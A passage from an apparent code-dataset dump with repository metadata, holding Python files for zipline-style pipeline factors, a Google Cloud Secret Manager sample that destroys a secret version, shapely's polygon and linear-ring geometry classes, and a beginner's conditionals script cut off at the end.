"x_0 {op} x_1".format(op=op),
(self, other),
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
elif isinstance(other, Number):
return return_type(
"x_0 {op} ({constant})".format(op=op, constant=other),
binds=(self,),
dtype=binop_return_dtype(op, self.dtype, other.dtype)
)
raise BadBinaryOperator(op, self, other)
return binary_operator
def reflected_binary_operator(op):
assert not is_comparison(op)
@with_name(method_name_for_op(op, commute=True))
@coerce_numbers_to_my_dtype
def reflected_binary_operator(self, other):
if isinstance(self, NumericalExpression):
self_expr, other_expr, new_inputs = self.build_binary_op(
op, other
)
return NumExprFactor(
"({left}) {op} ({right})".format(
left=other_expr,
right=self_expr,
op=op,
),
new_inputs,
dtype=binop_return_dtype(op, other.dtype, self.dtype)
)
elif isinstance(other, Number):
return NumExprFactor(
"{constant} {op} x_0".format(op=op, constant=other),
binds=(self,),
dtype=binop_return_dtype(op, other.dtype, self.dtype),
)
raise BadBinaryOperator(op, other, self)
return reflected_binary_operator
def unary_operator(op):
valid_ops = {'-'}
if op not in valid_ops:
raise ValueError("Invalid unary operator %s." % op)
@with_doc("Unary Operator: '%s'" % op)
@with_name(unary_op_name(op))
def unary_operator(self):
if self.dtype != float64_dtype:
raise TypeError(
"Can't apply unary operator {op!r} to instance of "
"{typename!r} with dtype {dtypename!r}.\n"
"{op!r} is only supported for Factors of dtype "
"'float64'.".format(
op=op,
typename=type(self).__name__,
dtypename=self.dtype.name,
)
)
# This can't be hoisted up a scope because the types returned by
# invoked.
if isinstance(self, NumericalExpression):
return NumExprFactor(
"{op}({expr})".format(op=op, expr=self._expr),
self.inputs,
dtype=float64_dtype,
)
else:
return NumExprFactor(
"{op}x_0".format(op=op),
(self,),
dtype=float64_dtype,
)
return unary_operator
def function_application(func):
if func not in NUMEXPR_MATH_FUNCS:
raise ValueError("Unsupported mathematical function '%s'" % func)
@with_name(func)
def mathfunc(self):
if isinstance(self, NumericalExpression):
return NumExprFactor(
"{func}({expr})".format(func=func, expr=self._expr),
self.inputs,
dtype=float64_dtype,
)
else:
return NumExprFactor(
"{func}(x_0)".format(func=func),
(self,),
dtype=float64_dtype,
)
return mathfunc
def restrict_to_dtype(dtype, message_template):
def processor(factor_method, _, factor_instance):
factor_dtype = factor_instance.dtype
if factor_dtype != dtype:
raise TypeError(
message_template.format(
method_name=factor_method.__name__,
expected_dtype=dtype.name,
received_dtype=factor_dtype,
)
)
return factor_instance
return preprocess(self=processor)
# Decorators for Factor methods.
if_not_float64_tell_caller_to_use_isnull = restrict_to_dtype(
dtype=float64_dtype,
message_template=(
"{method_name}() was called on a factor of dtype {received_dtype}.\n"
"{method_name}() is only defined for dtype {expected_dtype}."
"To filter missing data, use isnull() or notnull()."
)
)
float64_only = restrict_to_dtype(
dtype=float64_dtype,
message_template=(
"{method_name}() is only defined on Factors of dtype {expected_dtype},"
" but it was called on a Factor of dtype {received_dtype}."
)
)
FACTOR_DTYPES = frozenset([datetime64ns_dtype, float64_dtype, int64_dtype])
class Factor(RestrictedDTypeMixin, ComputableTerm):
ALLOWED_DTYPES = FACTOR_DTYPES # Used by RestrictedDTypeMixin
# Dynamically add functions for creating NumExprFactor/NumExprFilter
# instances.
clsdict = locals()
clsdict.update(
{
method_name_for_op(op): binary_operator(op)
# Don't override __eq__ because it breaks comparisons on tuples of
for op in MATH_BINOPS.union(COMPARISONS - {'=='})
}
)
clsdict.update(
{
method_name_for_op(op, commute=True): reflected_binary_operator(op)
for op in MATH_BINOPS
}
)
clsdict.update(
{
unary_op_name(op): unary_operator(op)
for op in UNARY_OPS
}
)
clsdict.update(
{
funcname: function_application(funcname)
for funcname in NUMEXPR_MATH_FUNCS
}
)
__truediv__ = clsdict['__div__']
__rtruediv__ = clsdict['__rdiv__']
eq = binary_operator('==')
@expect_types(
mask=(Filter, NotSpecifiedType),
groupby=(Classifier, NotSpecifiedType),
)
@float64_only
def demean(self, mask=NotSpecified, groupby=NotSpecified):
def demean(row):
return row - nanmean(row)
return GroupedRowTransform(
transform=demean,
factor=self,
mask=mask,
groupby=groupby,
)
@expect_types(
mask=(Filter, NotSpecifiedType),
groupby=(Classifier, NotSpecifiedType),
)
@float64_only
def zscore(self, mask=NotSpecified, groupby=NotSpecified):
def zscore(row):
return (row - nanmean(row)) / nanstd(row)
return GroupedRowTransform(
transform=zscore,
factor=self,
mask=mask,
groupby=groupby,
)
def rank(self, method='ordinal', ascending=True, mask=NotSpecified):
return Rank(self, method=method, ascending=ascending, mask=mask)
@expect_types(bins=int, mask=(Filter, NotSpecifiedType))
def quantiles(self, bins, mask=NotSpecified):
if mask is NotSpecified:
mask = self.mask
return Quantiles(inputs=(self,), bins=bins, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def quartiles(self, mask=NotSpecified):
return self.quantiles(bins=4, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def quintiles(self, mask=NotSpecified):
return self.quantiles(bins=5, mask=mask)
@expect_types(mask=(Filter, NotSpecifiedType))
def deciles(self, mask=NotSpecified):
return self.quantiles(bins=10, mask=mask)
def top(self, N, mask=NotSpecified):
return self.rank(ascending=False, mask=mask) <= N
def bottom(self, N, mask=NotSpecified):
return self.rank(ascending=True, mask=mask) <= N
def percentile_between(self,
min_percentile,
max_percentile,
mask=NotSpecified):
return PercentileFilter(
self,
min_percentile=min_percentile,
max_percentile=max_percentile,
mask=mask,
)
def isnull(self):
if self.dtype == float64_dtype:
return self.isnan()
else:
return NullFilter(self)
def notnull(self):
return ~self.isnull()
@if_not_float64_tell_caller_to_use_isnull
def isnan(self):
return self != self
@if_not_float64_tell_caller_to_use_isnull
def notnan(self):
return ~self.isnan()
@if_not_float64_tell_caller_to_use_isnull
def isfinite(self):
return (-inf < self) & (self < inf)
class NumExprFactor(NumericalExpression, Factor):
pass
class GroupedRowTransform(Factor):
window_length = 0
def __new__(cls, transform, factor, mask, groupby):
if mask is NotSpecified:
mask = factor.mask
else:
mask = mask & factor.mask
if groupby is NotSpecified:
groupby = Everything(mask=mask)
return super(GroupedRowTransform, cls).__new__(
GroupedRowTransform,
transform=transform,
inputs=(factor, groupby),
missing_value=factor.missing_value,
mask=mask,
dtype=factor.dtype,
)
def _init(self, transform, *args, **kwargs):
self._transform = transform
return super(GroupedRowTransform, self)._init(*args, **kwargs)
@classmethod
def static_identity(cls, transform, *args, **kwargs):
return (
super(GroupedRowTransform, cls).static_identity(*args, **kwargs),
transform,
)
def _compute(self, arrays, dates, assets, mask):
data = arrays[0]
null_group_value = self.inputs[1].missing_value
group_labels = where(
mask,
arrays[1],
null_group_value,
)
return where(
group_labels != null_group_value,
naive_grouped_rowwise_apply(
data=data,
group_labels=group_labels,
func=self._transform,
),
self.missing_value,
)
@property
def transform_name(self):
return self._transform.__name__
def short_repr(self):
return type(self).__name__ + '(%r)' % self.transform_name
class Rank(SingleInputMixin, Factor):
window_length = 0
dtype = float64_dtype
def __new__(cls, factor, method, ascending, mask):
return super(Rank, cls).__new__(
cls,
inputs=(factor,),
method=method,
ascending=ascending,
mask=mask,
)
def _init(self, method, ascending, *args, **kwargs):
self._method = method
self._ascending = ascending
return super(Rank, self)._init(*args, **kwargs)
@classmethod
def static_identity(cls, method, ascending, *args, **kwargs):
return (
super(Rank, cls).static_identity(*args, **kwargs),
method,
ascending,
)
def _validate(self):
if self._method not in _RANK_METHODS:
raise UnknownRankMethod(
method=self._method,
choices=set(_RANK_METHODS),
)
return super(Rank, self)._validate()
def _compute(self, arrays, dates, assets, mask):
return masked_rankdata_2d(
arrays[0],
mask,
self.inputs[0].missing_value,
self._method,
self._ascending,
)
def __repr__(self):
return "{type}({input_}, method='{method}', mask={mask})".format(
type=type(self).__name__,
input_=self.inputs[0],
method=self._method,
mask=self.mask,
)
class CustomFactor(PositiveWindowLengthMixin, CustomTermMixin, Factor):
dtype = float64_dtype
class Latest(LatestMixin, CustomFactor):
window_length = 1
def compute(self, today, assets, out, data):
out[:] = data[-1]
| true
| true
|
f705417d19cb9869018feb9f86bc6330c83dbbeb
| 1,953
|
py
|
Python
|
secretmanager/api-client/destroy_secret_version.py
|
m-abba/python-docs-samples
|
b00f00d734b89edae8ae6876d6261e19dc82cd34
|
[
"Apache-2.0"
] | 1
|
2020-03-05T18:24:45.000Z
|
2020-03-05T18:24:45.000Z
|
secretmanager/api-client/destroy_secret_version.py
|
m-abba/python-docs-samples
|
b00f00d734b89edae8ae6876d6261e19dc82cd34
|
[
"Apache-2.0"
] | 1
|
2022-01-14T23:28:27.000Z
|
2022-01-14T23:28:27.000Z
|
secretmanager/api-client/destroy_secret_version.py
|
m-abba/python-docs-samples
|
b00f00d734b89edae8ae6876d6261e19dc82cd34
|
[
"Apache-2.0"
] | 2
|
2020-06-07T07:03:00.000Z
|
2021-04-10T18:22:25.000Z
|
#!/usr/bin/env python
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
"""
command line application and sample code for destroying a secret verison.
"""
import argparse
# [START secretmanager_destroy_secret_version]
def destroy_secret_version(project_id, secret_id, version_id):
"""
Destroy the given secret version, making the payload irrecoverable. Other
secrets versions are unaffected.
"""
# Import the Secret Manager client library.
from google.cloud import secretmanager_v1beta1 as secretmanager
# Create the Secret Manager client.
client = secretmanager.SecretManagerServiceClient()
# Build the resource name of the secret version
name = client.secret_version_path(project_id, secret_id, version_id)
# Destroy the secret version.
response = client.destroy_secret_version(name)
print('Destroyed secret version: {}'.format(response.name))
# [END secretmanager_destroy_secret_version]
return response
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('project_id', help='id of the GCP project')
parser.add_argument('secret_id', help='id of the secret from which to act')
parser.add_argument('version_id', help='id of the version to destroy')
args = parser.parse_args()
destroy_secret_version(args.project_id, args.secret_id, args.version_id)
| 34.263158
| 79
| 0.752176
|
import argparse
def destroy_secret_version(project_id, secret_id, version_id):
from google.cloud import secretmanager_v1beta1 as secretmanager
client = secretmanager.SecretManagerServiceClient()
name = client.secret_version_path(project_id, secret_id, version_id)
response = client.destroy_secret_version(name)
print('Destroyed secret version: {}'.format(response.name))
return response
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('project_id', help='id of the GCP project')
parser.add_argument('secret_id', help='id of the secret from which to act')
parser.add_argument('version_id', help='id of the version to destroy')
args = parser.parse_args()
destroy_secret_version(args.project_id, args.secret_id, args.version_id)
| true
| true
|
f70541cbb5540d0c4d4bcc2d81b9b62daf4c08a3
| 13,756
|
py
|
Python
|
shapely/geometry/polygon.py
|
tsauerwein/shapely
|
d0bdd5f99cc8be9ce6a1022ff971fbd5deff2dad
|
[
"BSD-3-Clause"
] | null | null | null |
shapely/geometry/polygon.py
|
tsauerwein/shapely
|
d0bdd5f99cc8be9ce6a1022ff971fbd5deff2dad
|
[
"BSD-3-Clause"
] | null | null | null |
shapely/geometry/polygon.py
|
tsauerwein/shapely
|
d0bdd5f99cc8be9ce6a1022ff971fbd5deff2dad
|
[
"BSD-3-Clause"
] | null | null | null |
"""Polygons and their linear ring components
"""
from ctypes import c_double, c_void_p, cast, POINTER
from ctypes import ArgumentError
import weakref
from shapely.algorithms.cga import signed_area
from shapely.coords import required
from shapely.geos import lgeos
from shapely.geometry.base import BaseGeometry
from shapely.geometry.linestring import LineString, LineStringAdapter
from shapely.geometry.proxy import PolygonProxy
__all__ = ['Polygon', 'asPolygon', 'LinearRing', 'asLinearRing']
class LinearRing(LineString):
"""
A closed one-dimensional feature comprising one or more line segments
A LinearRing that crosses itself or touches itself at a single point is
invalid and operations on it may fail.
"""
def __init__(self, coordinates=None):
"""
Parameters
----------
coordinates : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples
Rings are implicitly closed. There is no need to specific a final
coordinate pair identical to the first.
Example
-------
Construct a square ring.
>>> ring = LinearRing( ((0, 0), (0, 1), (1 ,1 ), (1 , 0)) )
>>> ring.is_closed
True
>>> ring.length
4.0
"""
BaseGeometry.__init__(self)
if coordinates is not None:
self._set_coords(coordinates)
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
# Coordinate access
_get_coords = BaseGeometry._get_coords
def _set_coords(self, coordinates):
self.empty()
self._geom, self._ndim = geos_linearring_from_py(coordinates)
coords = property(_get_coords, _set_coords)
@property
def is_ccw(self):
"""True is the ring is oriented counter clock-wise"""
return bool(self.impl['is_ccw'](self))
@property
def is_simple(self):
"""True if the geometry is simple, meaning that any self-intersections
are only at boundary points, else False"""
return LineString(self).is_simple
class LinearRingAdapter(LineStringAdapter):
__p__ = None
def __init__(self, context):
self.context = context
self.factory = geos_linearring_from_py
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
coords = property(BaseGeometry._get_coords)
def asLinearRing(context):
"""Adapt an object to the LinearRing interface"""
return LinearRingAdapter(context)
class InteriorRingSequence(object):
_factory = None
_geom = None
__p__ = None
_ndim = None
_index = 0
_length = 0
__rings__ = None
_gtag = None
def __init__(self, parent):
self.__p__ = parent
self._geom = parent._geom
self._ndim = parent._ndim
def __iter__(self):
self._index = 0
self._length = self.__len__()
return self
def next(self):
if self._index < self._length:
ring = self._get_ring(self._index)
self._index += 1
return ring
else:
raise StopIteration
def __len__(self):
return lgeos.GEOSGetNumInteriorRings(self._geom)
def __getitem__(self, key):
m = self.__len__()
if isinstance(key, int):
if key + m < 0 or key >= m:
raise IndexError("index out of range")
if key < 0:
i = m + key
else:
i = key
return self._get_ring(i)
elif isinstance(key, slice):
res = []
start, stop, stride = key.indices(m)
for i in xrange(start, stop, stride):
res.append(self._get_ring(i))
return res
else:
raise TypeError("key must be an index or slice")
@property
def _longest(self):
max = 0
for g in iter(self):
l = len(g.coords)
if l > max:
max = l
def gtag(self):
return hash(repr(self.__p__))
def _get_ring(self, i):
gtag = self.gtag()
if gtag != self._gtag:
self.__rings__ = {}
if i not in self.__rings__:
g = lgeos.GEOSGetInteriorRingN(self._geom, i)
ring = LinearRing()
ring.__geom__ = g
ring.__p__ = self
ring._owned = True
ring._ndim = self._ndim
self.__rings__[i] = weakref.ref(ring)
return self.__rings__[i]()
class Polygon(BaseGeometry):
"""
A two-dimensional figure bounded by a linear ring
A polygon has a non-zero area. It may have one or more negative-space
"holes" which are also bounded by linear rings. If any rings cross each
other, the feature is invalid and operations on it may fail.
Attributes
----------
exterior : LinearRing
The ring which bounds the positive space of the polygon.
interiors : sequence
A sequence of rings which bound all existing holes.
"""
_exterior = None
_interiors = []
_ndim = 2
def __init__(self, shell=None, holes=None):
"""
Parameters
----------
shell : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples
holes : sequence
A sequence of objects which satisfy the same requirements as the
shell parameters above
Example
-------
Create a square polygon with no holes
>>> coords = ((0., 0.), (0., 1.), (1., 1.), (1., 0.), (0., 0.))
>>> polygon = Polygon(coords)
>>> polygon.area
1.0
"""
BaseGeometry.__init__(self)
if shell is not None:
self._geom, self._ndim = geos_polygon_from_py(shell, holes)
@property
def exterior(self):
if self.is_empty:
return None
elif self._exterior is None or self._exterior() is None:
g = lgeos.GEOSGetExteriorRing(self._geom)
ring = LinearRing()
ring.__geom__ = g
ring.__p__ = self
ring._owned = True
ring._ndim = self._ndim
self._exterior = weakref.ref(ring)
return self._exterior()
@property
def interiors(self):
if self.is_empty:
return []
return InteriorRingSequence(self)
@property
def ctypes(self):
if not self._ctypes_data:
self._ctypes_data = self.exterior.ctypes
return self._ctypes_data
@property
def __array_interface__(self):
raise NotImplementedError(
"A polygon does not itself provide the array interface. Its rings do.")
def _get_coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
def _set_coords(self, ob):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def __geo_interface__(self):
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {
'type': 'Polygon',
'coordinates': tuple(coords)
}
class PolygonAdapter(PolygonProxy, Polygon):
def __init__(self, shell, holes=None):
self.shell = shell
self.holes = holes
self.context = (shell, holes)
self.factory = geos_polygon_from_py
@property
def _ndim(self):
try:
# From array protocol
array = self.shell.__array_interface__
n = array['shape'][1]
assert n == 2 or n == 3
return n
except AttributeError:
# Fall back on list
return len(self.shell[0])
def asPolygon(shell, holes=None):
"""Adapt objects to the Polygon interface"""
return PolygonAdapter(shell, holes)
def orient(polygon, sign=1.0):
s = float(sign)
rings = []
ring = polygon.exterior
if signed_area(ring)/s >= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
for ring in polygon.interiors:
if signed_area(ring)/s <= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
return Polygon(rings[0], rings[1:])
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
# If numpy is present, we use numpy.require to ensure that we have a
# C-continguous array that owns its data. View data will be copied.
ob = required(ob)
try:
# From array protocol
array = ob.__array_interface__
assert len(array['shape']) == 2
m = array['shape'][0]
n = array['shape'][1]
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert n == 2 or n == 3
# Make pointer to the coordinate array
if isinstance(array['data'], tuple):
# numpy tuple (addr, read-only)
cp = cast(array['data'][0], POINTER(c_double))
else:
cp = array['data']
# Add closing coordinates to sequence?
if cp[0] != cp[m*n-n] or cp[1] != cp[m*n-n+1]:
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
if n != update_ndim:
raise ValueError(
"Wrong coordinate dimensions; this geometry has dimensions: %d" \
% update_ndim)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in xrange(m):
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, cp[n*i])
lgeos.GEOSCoordSeq_setY(cs, i, cp[n*i+1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, i, cp[n*i+2])
# Add closing coordinates to sequence?
if M > m:
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M-1, cp[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, cp[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, cp[2])
except AttributeError:
# Fall back on list
m = len(ob)
n = len(ob[0])
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert (n == 2 or n == 3)
# Add closing coordinates if not provided
if m == 3 or ob[0][0] != ob[-1][0] or ob[0][1] != ob[-1][1]:
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
if n != update_ndim:
raise ValueError(
"Wrong coordinate dimensions; this geometry has dimensions: %d" \
% update_ndim)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in xrange(m):
coords = ob[i]
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
# Add closing coordinates to sequence?
if M > m:
coords = ob[0]
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M-1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
def update_linearring_from_py(geom, ob):
geos_linearring_from_py(ob, geom._geom, geom._ndim)
def geos_polygon_from_py(shell, holes=None):
if shell is not None:
geos_shell, ndim = geos_linearring_from_py(shell)
if holes:
ob = holes
L = len(ob)
exemplar = ob[0]
try:
N = len(exemplar[0])
except TypeError:
N = exemplar._ndim
assert L >= 1
assert N == 2 or N == 3
# Array of pointers to ring geometries
geos_holes = (c_void_p * L)()
# add to coordinate sequence
for l in xrange(L):
geom, ndim = geos_linearring_from_py(ob[l])
geos_holes[l] = cast(geom, c_void_p)
else:
geos_holes = POINTER(c_void_p)()
L = 0
return (
lgeos.GEOSGeom_createPolygon(
c_void_p(geos_shell),
geos_holes,
L
),
ndim
)
# Test runner
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
| 29.268085
| 81
| 0.557793
|
from ctypes import c_double, c_void_p, cast, POINTER
from ctypes import ArgumentError
import weakref
from shapely.algorithms.cga import signed_area
from shapely.coords import required
from shapely.geos import lgeos
from shapely.geometry.base import BaseGeometry
from shapely.geometry.linestring import LineString, LineStringAdapter
from shapely.geometry.proxy import PolygonProxy
__all__ = ['Polygon', 'asPolygon', 'LinearRing', 'asLinearRing']
class LinearRing(LineString):
def __init__(self, coordinates=None):
BaseGeometry.__init__(self)
if coordinates is not None:
self._set_coords(coordinates)
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
_get_coords = BaseGeometry._get_coords
def _set_coords(self, coordinates):
self.empty()
self._geom, self._ndim = geos_linearring_from_py(coordinates)
coords = property(_get_coords, _set_coords)
@property
def is_ccw(self):
return bool(self.impl['is_ccw'](self))
@property
def is_simple(self):
return LineString(self).is_simple
class LinearRingAdapter(LineStringAdapter):
__p__ = None
def __init__(self, context):
self.context = context
self.factory = geos_linearring_from_py
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
coords = property(BaseGeometry._get_coords)
def asLinearRing(context):
return LinearRingAdapter(context)
class InteriorRingSequence(object):
_factory = None
_geom = None
__p__ = None
_ndim = None
_index = 0
_length = 0
__rings__ = None
_gtag = None
def __init__(self, parent):
self.__p__ = parent
self._geom = parent._geom
self._ndim = parent._ndim
def __iter__(self):
self._index = 0
self._length = self.__len__()
return self
def next(self):
if self._index < self._length:
ring = self._get_ring(self._index)
self._index += 1
return ring
else:
raise StopIteration
def __len__(self):
return lgeos.GEOSGetNumInteriorRings(self._geom)
def __getitem__(self, key):
m = self.__len__()
if isinstance(key, int):
if key + m < 0 or key >= m:
raise IndexError("index out of range")
if key < 0:
i = m + key
else:
i = key
return self._get_ring(i)
elif isinstance(key, slice):
res = []
start, stop, stride = key.indices(m)
for i in xrange(start, stop, stride):
res.append(self._get_ring(i))
return res
else:
raise TypeError("key must be an index or slice")
@property
def _longest(self):
max = 0
for g in iter(self):
l = len(g.coords)
if l > max:
max = l
def gtag(self):
return hash(repr(self.__p__))
def _get_ring(self, i):
gtag = self.gtag()
if gtag != self._gtag:
self.__rings__ = {}
if i not in self.__rings__:
g = lgeos.GEOSGetInteriorRingN(self._geom, i)
ring = LinearRing()
ring.__geom__ = g
ring.__p__ = self
ring._owned = True
ring._ndim = self._ndim
self.__rings__[i] = weakref.ref(ring)
return self.__rings__[i]()
class Polygon(BaseGeometry):
_exterior = None
_interiors = []
_ndim = 2
def __init__(self, shell=None, holes=None):
BaseGeometry.__init__(self)
if shell is not None:
self._geom, self._ndim = geos_polygon_from_py(shell, holes)
@property
def exterior(self):
if self.is_empty:
return None
elif self._exterior is None or self._exterior() is None:
g = lgeos.GEOSGetExteriorRing(self._geom)
ring = LinearRing()
ring.__geom__ = g
ring.__p__ = self
ring._owned = True
ring._ndim = self._ndim
self._exterior = weakref.ref(ring)
return self._exterior()
@property
def interiors(self):
if self.is_empty:
return []
return InteriorRingSequence(self)
@property
def ctypes(self):
if not self._ctypes_data:
self._ctypes_data = self.exterior.ctypes
return self._ctypes_data
@property
def __array_interface__(self):
raise NotImplementedError(
"A polygon does not itself provide the array interface. Its rings do.")
def _get_coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
def _set_coords(self, ob):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def __geo_interface__(self):
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {
'type': 'Polygon',
'coordinates': tuple(coords)
}
class PolygonAdapter(PolygonProxy, Polygon):
def __init__(self, shell, holes=None):
self.shell = shell
self.holes = holes
self.context = (shell, holes)
self.factory = geos_polygon_from_py
@property
def _ndim(self):
try:
array = self.shell.__array_interface__
n = array['shape'][1]
assert n == 2 or n == 3
return n
except AttributeError:
return len(self.shell[0])
def asPolygon(shell, holes=None):
return PolygonAdapter(shell, holes)
def orient(polygon, sign=1.0):
s = float(sign)
rings = []
ring = polygon.exterior
if signed_area(ring)/s >= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
for ring in polygon.interiors:
if signed_area(ring)/s <= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
return Polygon(rings[0], rings[1:])
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
ob = required(ob)
try:
array = ob.__array_interface__
assert len(array['shape']) == 2
m = array['shape'][0]
n = array['shape'][1]
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert n == 2 or n == 3
if isinstance(array['data'], tuple):
cp = cast(array['data'][0], POINTER(c_double))
else:
cp = array['data']
if cp[0] != cp[m*n-n] or cp[1] != cp[m*n-n+1]:
M = m + 1
else:
M = m
if update_geom is not None:
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
if n != update_ndim:
raise ValueError(
"Wrong coordinate dimensions; this geometry has dimensions: %d" \
% update_ndim)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
for i in xrange(m):
lgeos.GEOSCoordSeq_setX(cs, i, cp[n*i])
lgeos.GEOSCoordSeq_setY(cs, i, cp[n*i+1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, i, cp[n*i+2])
if M > m:
lgeos.GEOSCoordSeq_setX(cs, M-1, cp[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, cp[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, cp[2])
except AttributeError:
m = len(ob)
n = len(ob[0])
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert (n == 2 or n == 3)
if m == 3 or ob[0][0] != ob[-1][0] or ob[0][1] != ob[-1][1]:
M = m + 1
else:
M = m
if update_geom is not None:
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
if n != update_ndim:
raise ValueError(
"Wrong coordinate dimensions; this geometry has dimensions: %d" \
% update_ndim)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
for i in xrange(m):
coords = ob[i]
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
if M > m:
coords = ob[0]
lgeos.GEOSCoordSeq_setX(cs, M-1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
def update_linearring_from_py(geom, ob):
geos_linearring_from_py(ob, geom._geom, geom._ndim)
def geos_polygon_from_py(shell, holes=None):
if shell is not None:
geos_shell, ndim = geos_linearring_from_py(shell)
if holes:
ob = holes
L = len(ob)
exemplar = ob[0]
try:
N = len(exemplar[0])
except TypeError:
N = exemplar._ndim
assert L >= 1
assert N == 2 or N == 3
geos_holes = (c_void_p * L)()
for l in xrange(L):
geom, ndim = geos_linearring_from_py(ob[l])
geos_holes[l] = cast(geom, c_void_p)
else:
geos_holes = POINTER(c_void_p)()
L = 0
return (
lgeos.GEOSGeom_createPolygon(
c_void_p(geos_shell),
geos_holes,
L
),
ndim
)
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
| true
| true
|
f70541d9d771fb542f9dab03839544e3d44ed928
| 658
|
py
|
Python
|
TryAPP1.0/condition.py
|
deepankur797/random
|
fc7a1ac60d9de08c79bc5f5676705e45531ce6d9
|
[
"MIT"
] | null | null | null |
TryAPP1.0/condition.py
|
deepankur797/random
|
fc7a1ac60d9de08c79bc5f5676705e45531ce6d9
|
[
"MIT"
] | null | null | null |
TryAPP1.0/condition.py
|
deepankur797/random
|
fc7a1ac60d9de08c79bc5f5676705e45531ce6d9
|
[
"MIT"
] | null | null | null |
x=2
print(x == 2)
print(x == 3)
print(x<3)
#Boolean operators
name = "John"
age = 23
if name == "John" and age == 23:
print("Your name is John, and you are also 23 years old.")
if name == "John" or name == "Rick":
print("Your name is either John or Rick.")
# in operator
#The "in" operator could be used to check if a specified object exists within an iterable object container, such as a list:
mylist=["John","Rick"]
if name in mylist:
print("You are here with us")
# if else statement block in python
x=3
if(x==2):
print("x is 2")
elif(x==3):
print("x is 3")
else:
print("value doesnot match")
| 20.5625
| 124
| 0.612462
|
x=2
print(x == 2)
print(x == 3)
print(x<3)
name = "John"
age = 23
if name == "John" and age == 23:
print("Your name is John, and you are also 23 years old.")
if name == "John" or name == "Rick":
print("Your name is either John or Rick.")
mylist=["John","Rick"]
if name in mylist:
print("You are here with us")
x=3
if(x==2):
